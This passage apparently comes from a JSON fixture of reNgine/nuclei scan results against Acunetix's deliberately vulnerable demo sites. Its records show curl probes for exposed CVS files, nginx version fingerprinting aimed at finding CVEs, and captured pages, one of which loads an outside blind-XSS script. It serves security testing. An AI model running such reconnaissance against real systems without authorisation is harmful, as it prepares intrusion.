/CVS/Entries HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/607.1.40 (KHTML, like Gecko) Version/9.1.2 Safari/607.1.40\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:34:43 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 154, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0' 'http://testphp.vulnweb.com/CVS/Repository'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Repository", + "discovered_date": "2024-11-13T02:34:47.983Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Repository HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 8\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:34:43 GMT\r\nEtag: "4dca64a4-8"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\nacupart\n", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 155, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/608.2.11 (KHTML, like Gecko) Version/9.1.2 Safari/608.2.11' 'http://testphp.vulnweb.com/CVS/Entries.Log'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries.Log", + "discovered_date": "2024-11-13T02:34:48.092Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries.Log HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/608.2.11 (KHTML, like Gecko) Version/9.1.2 Safari/608.2.11\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:34:43 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 156, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3", + "discovered_date": "2024-11-13T02:34:48.170Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:43 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 157, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0' 'http://testphp.vulnweb.com/CVS/Root'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Root", + "discovered_date": "2024-11-13T02:34:48.251Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Root HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:34:43 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 158, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15' 'http://testphp.vulnweb.com'", + "type": "http", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:48.331Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:43 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n"http://www.w3.org/TR/html4/loose.dtd">\n<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">\n\n<!-- InstanceBeginEditable name="document_title_rgn" -->\n<title>Home of Acunetix Art</title>\n<!-- InstanceEndEditable -->\n<link rel="stylesheet" href="style.css" type="text/css">\n<!-- InstanceBeginEditable name="headers_rgn" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language="JavaScript" type="text/JavaScript">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id="mainLayer" style="position:absolute; width:700px; z-index:1">\n<div id="masthead"> \n <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> \n <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>\n <div id="globalNav"> \n \t<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>\n\t<td align="left">\n\t\t<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists\n\t\t</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | \n\t\t<a href="guestbook.php">guestbook</a> | \n\t\t<a href="AJAX/index.php">AJAX Demo</a>\n\t</td>\n\t<td align="right">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name="content_rgn" -->\n<div id="content">\n\t<h2 id="pageName">welcome to our page</h2>\n\t <div class="story">\n\t\t<h3>Test site for Acunetix WVS.</h3>\n\t </div>\n</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id="navBar"> \n <div id="search"> \n <form action="search.php?test=query" method="post"> \n <label>search art</label> \n <input name="searchFor" type="text" size="10"> \n <input name="goButton" type="submit" value="go"> \n </form> \n </div> \n <div id="sectionLinks"> \n <ul> \n <li><a href="categories.php">Browse categories</a></li> \n <li><a href="artists.php">Browse artists</a></li> \n <li><a href="cart.php">Your cart</a></li> \n <li><a href="login.php">Signup</a></li>\n\t <li><a href="userinfo.php">Your profile</a></li>\n\t <li><a href="guestbook.php">Our guestbook</a></li>\n\t\t<li><a href="AJAX/index.php">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class="relatedLinks"> \n <h3>Links</h3> \n <ul> \n <li><a href="http://www.acunetix.com">Security art</a></li> \n\t <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li>\n\t <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li>\n\t <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id="advert"> \n <p>\n <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66">\n <param name="movie" value="Flash/add.swf">\n <param name=quality value=high>\n <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | &copy;2019\n Acunetix Ltd \n</div> \n \n \n<br> \n<div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px">\n<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 159, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "angular", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 OS/10.0.22631' 'http://testhtml5.vulnweb.com'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:48.422Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 OS/10.0.22631\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 160, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.7.20' 'http://testhtml5.vulnweb.com/static/css'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/css", + "discovered_date": "2024-11-13T02:34:48.504Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/css HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.7.20\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:34:43 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 161, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15' 'http://testhtml5.vulnweb.com/static/app/partials'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/partials", + "discovered_date": "2024-11-13T02:34:48.574Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/partials HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:34:43 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 162, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L", + "discovered_date": "2024-11-13T02:34:48.646Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.34\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:44 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 163, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "angular", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:52.0) Gecko/20100101 Firefox/52.0' 'http://testhtml5.vulnweb.com/comment'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/comment", + "discovered_date": "2024-11-13T02:34:48.728Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /comment HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:52.0) Gecko/20100101 Firefox/52.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link 